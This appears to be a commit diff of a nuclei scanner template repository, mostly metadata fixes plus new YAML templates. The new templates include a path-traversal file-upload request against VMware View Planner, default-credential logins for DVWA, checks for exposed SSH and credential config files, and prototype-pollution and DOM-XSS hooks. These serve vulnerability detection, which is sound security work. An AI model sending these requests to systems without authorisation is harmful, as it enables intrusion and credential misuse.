reference: |
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
tags: cve,cve2020,jenkins,xss
requests:

4
cves/2020/CVE-2020-2140.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2020-2140
info:
author: j3ssie/geraldino2
name: Jenkin AuditTrailPlugin XSS
name: Jenkin Audit Trail Plugin XSS
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140
reference: https://www.jenkins.io/security/advisory/2020-03-09/
tags: cve,cve2020,jenkins,xss
requests:

2
cves/2020/CVE-2020-22840.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-22840
info:
name: CVE-2020-22840
name: b2evolution CMS Open redirect
author: geeknik
severity: low
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.

6
cves/2020/CVE-2020-25213.yaml
View File

@ -1,11 +1,13 @@
id: CVE-202025213
id: CVE-2020-25213
info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
reference: |
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-

4
cves/2020/CVE-2020-26073.yaml
View File

@ -1,9 +1,9 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
tags: cve,cve2020,cisco,lfi
requests:

8
cves/2020/CVE-2020-26214.yaml
View File

@ -5,12 +5,12 @@ info:
author: CasperGN
severity: critical
description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
reference: |
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
- https://pypi.org/project/alerta-server/8.1.0/
tags: cve,cve2020,alerta
# Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
# Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2
requests:
- method: GET
path:

4
cves/2020/CVE-2020-27986.yaml
View File

@ -8,7 +8,7 @@ info:
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
references: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
tags: cve,cve2020,sonarqube
requests:
@ -25,7 +25,7 @@ requests:
- email.smtp_port.secured
- email.smtp_username.secured
part: body
condtion: and
condition: and
- type: status
status:
- 200

8
cves/2020/CVE-2020-35476.yaml
View File

@ -20,13 +20,15 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- type: word
words:
- plotted
- timing
- cachehit
part: body
condtion: and
condition: and
- type: word
words:
- application/json

8
cves/2020/CVE-2020–26073.yaml
View File

@ -1,9 +1,13 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
description: |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.
reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: Directory Traversal
requests:

2
cves/2021/CVE-2021-21972.yaml
View File

@ -21,7 +21,7 @@ requests:
words:
- "VSPHERE-UI-JSESSIONID"
part: header
condtion: and
condition: and
- type: regex
regex:
- "(Install|Config) Final Progress"

44
cves/2021/CVE-2021-21978.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2021-21978
info:
name: VMware View Planner Unauthenticated RCE
author: dwisiswant0
severity: critical
reference: https://twitter.com/osama_hroot/status/1367258907601698816
description: |
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
tags: cve,cve2021,vmware,rce
requests:
- raw:
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="logfile"; filename=""
Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "File uploaded successfully."
part: body
- type: dsl
dsl:
- "len(body) == 28" # length of "\nFile uploaded successfully."

4
cves/2021/CVE-2021-25646.yaml
View File

@ -42,10 +42,10 @@ requests:
words:
- "application/json"
part: header
condtion: and
condition: and
- type: regex
regex:
- "numRowsRead"
- "numRowsIndexed"
part: body
condtion: and
condition: and

5
default-logins/activemq/activemq-default-login.yaml
View File

@ -6,6 +6,8 @@ info:
severity: medium
tags: apache,activemq,dlogin
# We could add a request condition block to only send this request if the
# site response URL had activeMQ broker stuff in the source.
requests:
- method: GET
path:
@ -18,6 +20,3 @@ requests:
- 'Welcome to the Apache ActiveMQ Console of <b>'
- '<h2>Broker</h2>'
condition: and
# We could add a request condition block to only send this request if the
# site response URL had activeMQ broker stuff in the source.

44
default-logins/dvwa/dvwa-default-login.yaml Normal file
View File

@ -0,0 +1,44 @@
id: dvwa-default-login
info:
name: DVWA Default Login
author: pdteam
severity: critical
requests:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID={{session}}; security=low
Connection: close
username=admin&password=password&Login=Login&user_token={{token}}
extractors:
- type: regex
name: token
group: 1
internal: true
part: body
regex:
- "hidden' name='user_token' value='([0-9a-z]+)'"
- type: kval
name: session
internal: true
part: body
kval:
- PHPSESSID
redirects: true
matchers:
- type: word
words:
- "You have logged in as 'admin'"

1
exposed-panels/identityguard-selfservice-entrust.yaml
View File

@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
req-condition: true
redirects: true
max-redirects: 2
matchers:

5
exposed-panels/workspace-one-uem.yaml
View File

@ -1,13 +1,10 @@
id: workspace-one-uem
# Reference:
# https://twitter.com/Jhaddix/status/1295861505963909120
info:
name: Workspace ONE UEM AirWatch Login Page
author: gevakun
severity: info
reference: https://twitter.com/Jhaddix/status/1295861505963909120
requests:
- method: GET
path:

11
exposed-tokens/generic/general-tokens.yaml
View File

@ -5,16 +5,15 @@ info:
author: nadino
severity: info
# Notes:-
# This template requires manual inspection once found valid match.
# Generic token could be anything matching below regex.
# Impact of leaked token depends on validation of leaked token.
requests:
- method: GET
path:
- '{{BaseURL}}'
# Notes:-
# This template requires manual inspection once found valid match.
# Generic token could be anything matching below regex.
# Impact of leaked token depends on validation of leaked token.
matchers-condition: and
matchers:
- type: dsl

24
exposures/configs/circleci-config.yaml Normal file
View File

@ -0,0 +1,24 @@
id: circleci-config
info:
name: circleci config.yml exposure
author: geeknik
severity: low
reference: https://circleci.com/docs/2.0/sample-config/
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/config.yml"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("^version: ", body) && contains(body, "jobs:") == true'
- type: status
status:
- 200

26
exposures/configs/circleci-ssh-config.yaml Normal file
View File

@ -0,0 +1,26 @@
id: circleci-ssh-config
info:
name: circleci ssh-config exposure
author: geeknik
severity: low
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/ssh-config"
matchers-condition: and
matchers:
- type: word
words:
- "Host"
- "HostName"
- "IdentityFile"
condition: and
- type: status
status:
- 200

4
exposures/configs/docker-compose-config.yml
View File

@ -2,7 +2,7 @@ id: docker-compose-config
info:
name: docker-compose.yml exposure
author: meme-lord & blckraven
author: meme-lord & blckraven & geeknik
severity: medium
requests:
@ -16,6 +16,8 @@ requests:
- "{{BaseURL}}/docker-compose.staging.yml"
- "{{BaseURL}}/docker-compose.dev.yml"
- "{{BaseURL}}/docker-compose-dev.yml"
- "{{BaseURL}}/docker-compose.override.yml"
matchers-condition: and
matchers:
- type: dsl

2
exposures/configs/sftp-credentials-exposure.yaml
View File

@ -19,7 +19,7 @@ requests:
- "file_permissions"
- "extra_list_connections"
part: body
condtion: and
condition: and
- type: status
status:

5
exposures/files/domcfg-page.yaml
View File

@ -3,10 +3,7 @@ info:
name: Lotus Domino Configuration Page
author: gevakun
severity: low
# Reference:
# https://twitter.com/Wh11teW0lf/status/1295594085445709824
# Do not test any website without permission
reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824
requests:
- method: GET

2
fuzzing/iis-shortname.yaml
View File

@ -46,8 +46,8 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
req-condition: true
matchers:
- type: dsl
name: iis-scan
dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"

43
headless/dvwa-headless-automatic-login.yaml Normal file
View File

@ -0,0 +1,43 @@
id: dvwa-headless-automatic-login
info:
name: DVWA Headless Automatic Login
author: pdteam
severity: high
tags: headless
headless:
- steps:
- args:
url: "{{BaseURL}}/login.php"
action: navigate
- action: waitload
- args:
by: x
xpath: /html/body/div/div[2]/form/fieldset/input
action: click
- action: waitload
- args:
by: x
value: admin
xpath: /html/body/div/div[2]/form/fieldset/input
action: text
- args:
by: x
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: click
- action: waitload
- args:
by: x
value: password
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: text
- args:
by: x
xpath: /html/body/div/div[2]/form/fieldset/p/input
action: click
- action: waitload
matchers:
- part: resp
type: word
words:
- "You have logged in as"

65
headless/postmessage-tracker.yaml Normal file
View File

@ -0,0 +1,65 @@
id: postmessage-tracker
info:
name: Postmessage Tracker
author: pd-team
severity: info
reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js
tags: headless,postmessage
headless:
- steps:
- action: setheader
args:
part: response
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
- action: script
args:
hook: true
code: |
(function() {window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
var oldListener = Window.prototype.addEventListener;
Window.prototype.addEventListener = function(type, listener, useCapture) {
if(type === 'message') {
logger(getStackTrace());
}
return oldListener.apply(this, arguments);
};
})();
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
matchers:
- type: word
part: alerts
words:
- "at Window.addEventListener"
extractors:
- type: kval
part: alerts
kval:
- alerts

96
headless/prototype-pollution-check.yaml Normal file
View File

@ -0,0 +1,96 @@
id: prototype-pollution-check
info:
name: Prototype Pollution Check
author: pd-team
severity: medium
reference: https://github.com/msrkp/PPScan
tags: headless
headless:
- steps:
- action: setheader
args:
part: response
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
- action: setheader
args:
part: response
key: X-Frame-Options
value: foo
- action: setheader
args:
part: response
key: If-None-Match
value: foo
- action: script
args:
hook: true
code: |
// Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js
(function() {window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
function check() {
loc = location.href;
if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) {
setTimeout(function() {
if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") {
logger(location.href);
}
var url = new URL(location.origin + location.pathname);
url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy";
location = url.href;
}, 5 * 1000);
} else if (loc.search("a0def12bce") != -1) {
setTimeout(function() {
if (Object.prototype.a0def12bce == "ddcb362f1d60") {
logger(location.href);
}
window.close();
}, 5 * 1000);
} else {
var url = new URL(loc);
url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60");
url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60");
location = url.href;
}
}
window.onload = function() {
if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
logger(location.href);
} else {
check();
}
};
var timerID = setInterval(function() {
if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
logger(location.href);
clearInterval(timerID);
}
}, 5 * 1000)})();
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
matchers:
- type: word
part: alerts
words:
- "__proto__"
extractors:
- type: kval
part: alerts
kval:
- alerts

81
headless/window-name-domxss.yaml Normal file
View File

@ -0,0 +1,81 @@
id: window-name-domxss
info:
name: window.name DOM XSS
author: pd-team
severity: medium
reference: https://public-firing-range.appspot.com/dom/index.html
tags: headless,xss,domxss
headless:
- steps:
- action: setheader
args:
part: response
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
- action: script
args:
hook: true
code: |
(function() {window.alerts = [];
function logger(found) {
window.alerts.push(found);
}
function getStackTrace () {
var stack;
try {
throw new Error('');
}
catch (error) {
stack = error.stack || '';
}
stack = stack.split('\n').map(function (line) { return line.trim(); });
return stack.splice(stack[0] == 'Error' ? 2 : 1);
}
window.name = "{{randstr_1}}'\"<>";
var oldEval = eval;
var oldDocumentWrite = document.write;
var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
Object.defineProperty(Element.prototype, 'innerHTML', {
set: function innerHTML_Setter(val) {
if (val.includes("{{randstr_1}}'\"<>")) {
logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});
}
return setter.call(this, val)
}
});
eval = function(data) {
if (data.includes("{{randstr_1}}'\"<>")) {
logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});
}
return oldEval.apply(this, arguments);
};
document.write = function(data) {
if (data.includes("{{randstr_1}}'\"<>")) {
logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});
}
return oldEval.apply(this, arguments);
};
})();
- args:
url: "{{BaseURL}}"
action: navigate
- action: waitload
- action: script
name: alerts
args:
code: "window.alerts"
matchers:
- type: word
part: alerts
words:
- "sink:"
extractors:
- type: kval
part: alerts
kval:
- alerts

1
misconfiguration/aem-groovyconsole.yaml
View File

@ -6,6 +6,7 @@ info:
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET

1
misconfiguration/airflow-api-exposure.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache Airflow API Exposure / Unauthenticated Access
author: pd-team
severity: medium
tags: apache,airflow,unauth
requests:
- method: GET

1
misconfiguration/apache-tomcat-snoop.yaml
View File

@ -6,6 +6,7 @@ info:
severity: low
description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
tags: apache
requests:
- method: GET

1
misconfiguration/apc-info.yaml
View File

@ -4,6 +4,7 @@ info:
name: APCu service information leakage
author: koti2
severity: low
tags: config
requests:
- method: GET

1
misconfiguration/aspx-debug-mode.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: info
reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled
tags: debug
requests:
- raw:

1
misconfiguration/aws-redirect.yaml
View File

@ -5,6 +5,7 @@ info:
author: manikanta a.k.a @secureitmania
severity: info
reference: https://link.medium.com/fgXKJHR9P7
tags: aws
requests:
- method: GET

1
misconfiguration/cgi-test-page.yaml
View File

@ -3,6 +3,7 @@ info:
name: CGI Test page
author: YASH ANAND @yashanand155
severity: info
tags: cgi
requests:
- method: GET

1
misconfiguration/d-link-arbitary-fileread.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
tags: dlink,lfi
requests:
- method: POST

1
misconfiguration/django-debug-detect.yaml
View File

@ -4,6 +4,7 @@ info:
name: Django Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: django,debug
requests:
- method: GET

1
misconfiguration/docker-registry.yaml
View File

@ -4,6 +4,7 @@ info:
name: Docker Registry Listing
author: puzzlepeaches
severity: medium
tags: docker
requests:
- method: GET

1
misconfiguration/druid-monitor.yaml
View File

@ -3,6 +3,7 @@ info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
severity: high
tags: druid,unauth
requests:
- method: GET

1
misconfiguration/drupal-user-enum-ajax.yaml
View File

@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Ajax]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET

1
misconfiguration/drupal-user-enum-redirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Redirect]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET

1
misconfiguration/elasticsearch.yaml
View File

@ -4,6 +4,7 @@ info:
name: ElasticSearch Information Disclosure
author: Shine
severity: low
tags: es,unauth
requests:
- method: GET

1
misconfiguration/exposed-docker-api.yaml
View File

@ -4,6 +4,7 @@ info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
severity: info
tags: docker,unauth
requests:
- method: GET

1
misconfiguration/exposed-kibana.yaml
View File

@ -4,6 +4,7 @@ info:
name: Exposed Kibana
author: Shine
severity: medium
tags: kibana,unauth
requests:
- method: GET

9
misconfiguration/exposed-service-now.yaml
View File

@ -5,11 +5,10 @@ info:
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
reference: https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Thanks to Th3G3nt3lman for the writeup
# https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Exploitation :- https://github.com/leo-hildegarde/SnowDownKB/
reference: |
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
- method: GET

3
misconfiguration/front-page-misconfig.yaml
View File

@ -4,8 +4,7 @@ info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
severity: info
# Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
requests:
- method: GET

29
misconfiguration/gitlab/gitlab-public-repos.yaml Normal file
View File

@ -0,0 +1,29 @@
id: gitlab-public-repos
info:
name: GitLab public repositories
author: ldionmarcil
severity: info
tags: gitlab
reference: |
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser
requests:
- method: GET
path:
- "{{BaseURL}}/api/v4/projects"
headers:
Cookie: _gitlab_session=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: _gitlab_session="
- type: word
part: body
words:
- "name_with_namespace"

1
misconfiguration/gitlab-snippets.yaml → misconfiguration/gitlab/gitlab-snippets.yaml
View File

@ -3,6 +3,7 @@ info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:

1
misconfiguration/hadoop-unauth.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache Hadoop Unauth
author: pdteam
severity: low
tags: apache,hadoop,unauth
requests:
- method: GET

2
misconfiguration/haproxy-status.yaml
View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/4191
tags: logs
tags: logs,haproxy
requests:
- method: GET

2
misconfiguration/horde-unauthenticated.yaml
View File

@ -4,7 +4,7 @@ info:
name: Horde Groupware Unauthenticated
author: pikpikcu
severity: critical
tags: horde
tags: horde,unauth
requests:
- method: GET

1
misconfiguration/http-etcd-unauthenticated-api-data-leak.yaml
View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://hackerone.com/reports/1088429
tags: unauth
requests:
- method: GET

1
misconfiguration/java-melody-exposed.yaml
View File

@ -4,6 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
severity: medium
tags: config
requests:
- method: GET

Some files were not shown because too many files have changed in this diff Show More